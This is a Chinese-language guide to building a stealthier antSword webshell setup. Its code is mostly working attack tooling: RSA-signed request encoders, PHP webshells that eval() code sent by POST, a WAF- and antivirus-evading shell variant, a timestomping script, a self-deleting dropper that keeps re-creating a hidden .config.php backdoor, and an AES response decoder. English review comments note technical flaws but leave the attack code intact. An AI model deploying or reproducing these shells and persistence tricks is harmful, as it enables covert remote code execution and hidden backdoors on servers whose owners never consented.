从0到1打造一款堪称完美antSword(蚁剑)
字数 911 2025-08-25 22:58:40
从0到1打造完美蚁剑(antSword)终极指南
0x00 前言
本指南将全面介绍如何从零开始打造一款功能强大且高度隐蔽的蚁剑(antSword)工具,涵盖流量加密、免杀处理、自动化部署等高级技术。
0x01 蚁剑核心组件解析
1. 发包方式
- 常规GET/POST请求
- 表单发包(绕过WAF)
- 分块传输(不稳定但对低性能WAF有效)
2. 编码器系统
- 用于对请求包进行编码处理
- 支持多种编码方式:base64、chr、rot13等
3. 解码器系统
- 用于对返回数据包进行解码
- 支持自定义解码逻辑
4. 插件模块
- 可扩展功能如自动上传提权脚本
- 支持联动操作
0x02 环境准备
1. 下载必要资源
# Third-party antSword add-ons. NOTE(review): encoders/decoders are JavaScript that
# the antSword client itself executes (the AES decoder below reaches
# window.antSword.remote.process, i.e. Node/Electron privileges), so review and pin
# to a known commit anything pulled from these repositories before loading it.
git clone https://github.com/AntSwordProject/AwesomeScript.git # collection of shell scripts
git clone https://github.com/AntSwordProject/AwesomeEncoder.git # collection of encoders/decoders
npm install crypto-js # CryptoJS, the library the AES-256-CFB decoder below requires
2. 蚁剑目录结构
source/
├── base
├── core
│ ├── asp
│ ├── aspx
│ ├── custom
│ ├── php
│ └── php4
├── language
└── modules
├── database
├── filemanager
├── plugin
├── settings
├── shellmanager
├── terminal
└── viewsite
0x03 核心源码分析
1. 核心文件功能
- index.js: 模块加载入口
- base.js: 配置加载和基础方法
- command.js: 命令执行模板处理
2. 关键功能实现
- 请求中间件处理
- 返回包解密机制
- 命令模板解析
0x04 打造全流量加密RSA Shell
1. RSA Shell优势
- 请求包用RSA私钥"加密"(实质是签名):只有持有私钥者能构造出可被shell执行的请求,但任何拿到shell文件中公钥的人都可以还原请求内容,因此提供的是认证而不是机密性
- 返回包AES动态对称加密绕过WAF(AES密钥随每次请求明文下发给shell,作用是规避规则匹配,对持有shell文件或公钥者并不保密)
- 随机参数防止规则匹配
- 支持multipart和分块传输
2. RSA配置生成
生成公钥/私钥对及对应的PHP shell代码
3. RSA编码器实现
module.exports = (pwd, data, ext = {}) => {
  // antSword encoder: splits the PHP payload (data['_']) into at most 80-character
  // chunks, runs each through the operator's RSA private key (ext.rsa.encryptPrivate,
  // base64 output) and sends them '|'-joined under the password parameter `pwd`.
  // NOTE(review): "encryptPrivate" is a signature-style operation — whoever holds the
  // matching public key (it is embedded in the PHP shell) can recover the plaintext,
  // so this authenticates the operator but does not hide the commands.
  // Chunking keeps each block under the RSA modulus size; 80 chars fits a 1024-bit key
  // with PKCS#1 v1.5 padding (117-byte limit) — presumably why 80 was chosen.
  const payload = data['_'];
  const chunkCount = Math.ceil(payload.length / 80);
  const chunkLen = Math.ceil(payload.length / chunkCount);
  const signedChunks = Array.from({ length: chunkCount }, (_, idx) =>
    ext['rsa'].encryptPrivate(payload.substring(idx * chunkLen, (idx + 1) * chunkLen), 'base64'),
  );
  data[pwd] = signedChunks.join('|');
  delete data['_'];
  return data;
};
4. PHP Shell实现
<?php
// RSA "encrypted" antSword shell. The client chunks its payload, runs each chunk
// through its RSA *private* key and sends them '|'-joined in POST parameter `ant`;
// this file recovers them with the embedded *public* key and eval()s the result.
// NOTE(review): private-key encryption is a signature, not encryption. The public
// key below is all that is needed to read every command sent to this shell, so the
// channel is authenticated (only the private-key holder can produce payloads that
// decrypt) but NOT confidential against anyone holding a copy of this file.
// A request without `ant` ends in eval('') — an empty 200 response, itself a
// fingerprint; @ only hides the undefined-index notice.
$cmd = @$_POST['ant'];
$pk = <<<EOF
-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCC9BPAAA3EgNhVX9x5kjXwwbrA
AJSSl46CsjcloOjytsQZoR/Tn0QxI/sCaHJ23/DLviDbhZbYh3aJjXDLrGJXnQvx
BUj1a/YZDq/ZqlibffV54ljOhh6A/IIk6KmXXZBETA9GxI32vqDfqvbnuzyZMWvT
ShEmTzwYh4qW53cN+wIDAQAB
-----END PUBLIC KEY-----
EOF;
// Chunks that fail openssl_public_decrypt() are silently skipped and the remaining
// ones are still concatenated and executed, so a damaged chunk changes the code
// that runs rather than aborting the request.
$cmds = explode("|", $cmd);
$pk = openssl_pkey_get_public($pk);
$cmd = '';
foreach ($cmds as $value) {
if (openssl_public_decrypt(base64_decode($value), $de, $pk)) {
$cmd .= $de;
}
}
// eval() of network-supplied code is the shell's entire purpose and its primary
// detection point (eval + openssl_public_decrypt + $_POST in one file).
eval($cmd);
5. 增强版RSA编码器(加密所有参数)
module.exports = (pwd, data, ext = {}) => {
  // Variant of the RSA encoder that also runs every extra request parameter through
  // the private key and prefixes the PHP payload with a 5-second freshness check.
  // NOTE(review): the extra parameters are not chunked, so any value longer than the
  // RSA block limit (117 bytes for a 1024-bit key with PKCS#1 v1.5) would fail in
  // ext.rsa.encryptPrivate — presumably they are all short.
  const signed = {};
  for (const name of Object.keys(data)) {
    if (name === '_') {
      continue;
    }
    signed[name] = ext['rsa'].encryptPrivate(data[name], 'base64');
  }
  // Replay guard evaluated by the shell: die() unless the target's time() is within
  // 5 s of the operator's clock — a skewed server clock kills every request.
  const nowSec = Math.floor(Date.now() / 1000);
  data['_'] = `if((time()-${nowSec})>5){die();};${data['_']}`;
  const payload = data['_'];
  const chunkCount = Math.ceil(payload.length / 80);
  const chunkLen = Math.ceil(payload.length / chunkCount);
  const chunks = [];
  for (let idx = 0; idx < chunkCount; idx++) {
    const piece = payload.substring(idx * chunkLen, (idx + 1) * chunkLen);
    chunks.push(ext['rsa'].encryptPrivate(piece, 'base64'));
  }
  signed[pwd] = chunks.join('|');
  delete data['_'];
  return signed;
};
0x05 无特征免杀处理技术
1. 免杀Shell实现
<?php
// "Parameter-less" variant of the RSA shell: instead of a fixed POST name it takes
// the *first* POST value, whatever its key, so a WAF rule cannot key on a name.
// Same caveat as above: the public key lets anyone read the traffic; it only
// authenticates the sender.
$pk = <<<EOF
-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCC9BPAAA3EgNhVX9x5kjXwwbrA
AJSSl46CsjcloOjytsQZoR/Tn0QxI/sCaHJ23/DLviDbhZbYh3aJjXDLrGJXnQvx
BUj1a/YZDq/ZqlibffV54ljOhh6A/IIk6KmXXZBETA9GxI32vqDfqvbnuzyZMWvT
ShEmTzwYh4qW53cN+wIDAQAB
-----END PUBLIC KEY-----
EOF;
// get_defined_vars()[@_POST]: `_POST` unquoted is an undefined constant; with the
// notice suppressed, PHP 7 falls back to the bare name as the string "_POST", which
// indexes the superglobal inside the file-scope variable table, and reset() returns
// its first value. Passing a temporary to reset() also raises a by-reference notice.
// NOTE(review): on PHP >= 8 reading an undefined constant throws Error, which `@`
// does not suppress, so this construction stops working there — confirm on target.
$cmds = explode("|", reset(get_defined_vars()[@_POST]));
$pk = openssl_pkey_get_public($pk);
$cmd = "";
foreach ($cmds as $value) {
if (openssl_public_decrypt(base64_decode($value), $de, $pk)) {
$cmd .= $de;
}
}
// eval() of attacker-supplied code: the detection point remains eval +
// openssl_public_decrypt even without a literal $_POST in the file.
eval($cmd);
0x06 自动化隐蔽后门实现
1. 文件时间修改代码
<?php
// Timestomping attempt: copy a neighbouring file's change time onto this file.
// NOTE(review): PHP touch(file, time) sets the *modification* (and access) time
// only; the inode change time (ctime) cannot be set from userland and is bumped to
// "now" by the touch itself, so filectime() on this file still reveals the tamper
// time. Filesystem functions report failure with E_WARNING and a false return, not
// an Exception, so the catch block below is effectively unreachable.
try {
// scandir() lists "." and ".." first, so the first hit is normally the document
// root directory itself; entries are relative names resolved against the current
// working directory, not $_SERVER['DOCUMENT_ROOT'] — presumably equal here, confirm.
$file = scandir($_SERVER['DOCUMENT_ROOT']);
foreach ($file as $name) {
if(@filectime($name)){
touch(__FILE__,filectime($name));
// After the touch above, this file's ctime is "now", so this sets the neighbour's
// mtime to the current time — making the neighbour look freshly modified.
touch($name,@filectime(__FILE__));
break;
}
}
} catch (Exception $e) {
echo "config is wrong!";
}
2. 内存木马自动部署
<?php
// Self-deleting dropper that keeps one PHP worker running to (re)create .config.php.
// set_time_limit(0) + ignore_user_abort(1): keep executing after the client
// disconnects. NOTE(review): php-fpm request_terminate_timeout or the SAPI's own
// limits may still kill the worker — not verified here.
set_time_limit(0);
ignore_user_abort(1);
unlink(__FILE__);
$shell = '<?php $pk = <<<EOF...'; // full shell source goes here
while(1){
// When the file exists this branch has no sleep: scandir() plus a chmod shell-out on
// every iteration, i.e. a CPU-spinning loop that is obvious in top/ps and spawns a
// /bin/sh child continuously. chmod 777 also leaves the shell writable by any
// local user. Paths are relative to the worker's cwd, not the document root.
if(file_exists(".config.php")){
try {
system('chmod 777 .config.php');
$file = scandir($_SERVER['DOCUMENT_ROOT']);
foreach ($file as $name) {
if(@filectime($name)){
// touch() sets mtime only; ctime is updated to "now" (see the timestomp note).
touch(".config.php", @filectime($name));
break;
}
}
// Filesystem functions emit warnings and return false; they do not throw
// Exception, so this catch is effectively unreachable.
} catch (Exception $e) {
echo "config is wrong!";
}
}else{
// 3600*60 = 216000 s (60 h), and the write happens only *after* the sleep: once
// the dropper has unlinked itself there is no shell on disk for 60 hours, and a
// deleted .config.php is restored only after the same delay. Possibly a typo for
// a shorter interval — confirm intent.
sleep(3600*60);
file_put_contents('.config.php',$shell);
}
}
0x07 高级流量加密技术
1. AES-256-CFB动态密钥加密解码器
'use strict';
const path = require('path');
var CryptoJS = require(path.join(window.antSword.remote.process.env.AS_WORKDIR, 'node_modules/crypto-js'));
function randomRange(min, max) {
  // Builds a random alphanumeric string [A-Za-z0-9]. Length is exactly `min` when
  // `max` is falsy, otherwise a random integer in [min, max].
  // NOTE(review): Math.random is not a CSPRNG and Math.round skews the end values
  // of each range; acceptable for an obfuscation key, not for a real secret.
  const alphabet = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789';
  const length = max ? Math.round(Math.random() * (max - min)) + min : min;
  let out = '';
  for (let i = 0; i < length; i++) {
    const pos = Math.round(Math.random() * (alphabet.length - 1));
    out += alphabet.charAt(pos);
  }
  return out;
}
// One 32-character key generated when the decoder is loaded. The shells above carry
// no key, so it has to reach the target inside each request (asoutput() below embeds
// it in the asenc() prologue) — anyone able to read the request can decrypt the reply.
var key = randomRange(32,32);
function decryptText(keyStr, text) {
  // Inverse of the PHP asenc(): AES-256-CFB, zero padding, IV equal to the key.
  // The key is right-padded with 'a' to 32 bytes so it always fits AES-256 (moot
  // for the 32-char key generated above, but keeps short keys working).
  // NOTE(review): key reused as IV, and a 32-byte IV handed to a 16-byte block
  // cipher, are both non-standard; this only works because the PHP side does the
  // same thing. Zero-padding removal is safe here only because the plaintext is
  // base64 text and never contains 0x00.
  const padded = Buffer.alloc(32, 'a');
  padded.write(keyStr, 0);
  const normalizedKey = padded.toString();
  const keyWords = CryptoJS.enc.Utf8.parse(normalizedKey);
  const decrypted = CryptoJS.AES.decrypt(text, keyWords, {
    iv: CryptoJS.enc.Utf8.parse(normalizedKey),
    mode: CryptoJS.mode.CFB,
    padding: CryptoJS.pad.ZeroPadding,
  });
  return decrypted.toString(CryptoJS.enc.Utf8);
}
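module.exports = {
  // PHP prologue antSword prepends to each request so the shell can encrypt its
  // output. Fix: the original emitted `$key=<key>;` without quotes, which PHP parses
  // as a constant — a parse error whenever the key starts with a digit, a warning
  // plus fallback to the bare name on PHP 7, and an "Undefined constant" Error on
  // PHP >= 8. The key is alphanumeric only (see randomRange), so embedding it in
  // double quotes needs no escaping.
  asoutput: () => {
    return `function asenc($out){
      $key="${key}";
      $iv=$key;
      return @base64_encode(openssl_encrypt(base64_encode($out), "AES-256-CFB", $key,OPENSSL_RAW_DATA|OPENSSL_ZERO_PADDING, $iv));
    }`.replace(/\n\s+/g, '');
  },
  // Response body is base64(AES-CFB(base64(out))): strip both layers to a string.
  // An empty body is passed through untouched.
  decode_str: (data, ext = {}) => {
    if (data.length === 0) return data;
    const inner = decryptText(key, data);
    return Buffer.from(inner, 'base64').toString();
  },
  // Same two layers, but the result stays a Buffer (presumably for binary transfers).
  decode_buff: (data, ext = {}) => {
    if (data.length === 0) return data;
    return Buffer.from(decryptText(key, Buffer.from(data).toString()), 'base64');
  },
};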
0x08 最佳实践建议
- 流量加密组合:RSA请求+AES返回+随机参数+分块传输
- 隐蔽性增强:修改文件时间戳(注意touch()只能改mtime/atime,ctime会被更新为当前时间)+隐藏文件名+内存驻留
- 免杀处理:无参数+非常规函数调用+代码混淆
- 自动化部署:定时检查+自动修复+环境适配
0x09 参考资源
- WAF拦截蚁剑参数处理方案
- [蚁剑绕WAF进化图鉴]
- [蚁剑动态秘钥编码器实现]
- [RSA在AWD攻防中的应用]
- [蚁剑客户端RCE分析]